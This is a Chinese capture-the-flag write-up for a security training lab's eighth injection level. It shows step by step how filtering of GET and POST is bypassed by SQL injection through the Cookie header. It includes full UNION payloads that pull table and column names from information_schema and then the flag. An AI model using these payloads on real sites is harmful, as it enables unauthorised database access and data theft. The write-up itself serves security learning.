网络信息安全攻防学习平台 注入关第八

小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!

http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1

题目提示过滤了get和post,也就是说,浏览器中的url输入框等东东是不用考虑了,所以我们可以考虑下   请求头中cookie注入。


网络信息安全攻防学习平台 注入关第八_第1张图片
and 1=1 
网络信息安全攻防学习平台 注入关第八_第2张图片
and 1=2

常规注入测试,结果很明显

那么我们就开始order  by


网络信息安全攻防学习平台 注入关第八_第3张图片
order by 4
网络信息安全攻防学习平台 注入关第八_第4张图片
order by 3

可以测出来是3个字段

网络信息安全攻防学习平台 注入关第八_第5张图片

联合查询一下是爆出来2,3


网络信息安全攻防学习平台 注入关第八_第6张图片
顺手查一下数据库


网络信息安全攻防学习平台 注入关第八_第7张图片
用这个

Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3

爆出数据库 manager_sqli8,   sae_user_sqli8


网络信息安全攻防学习平台 注入关第八_第8张图片

Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655F6D616E616765725F73716C6938),3

我们先查一下sae_manager_sqli8

因为sae_user_sqli8我查过了。。里面没有啊

爆出id,username,password

网络信息安全攻防学习平台 注入关第八_第9张图片
答案出来了

IamFlagCookieInject!

你可能感兴趣的:(网络信息安全攻防学习平台 注入关第八)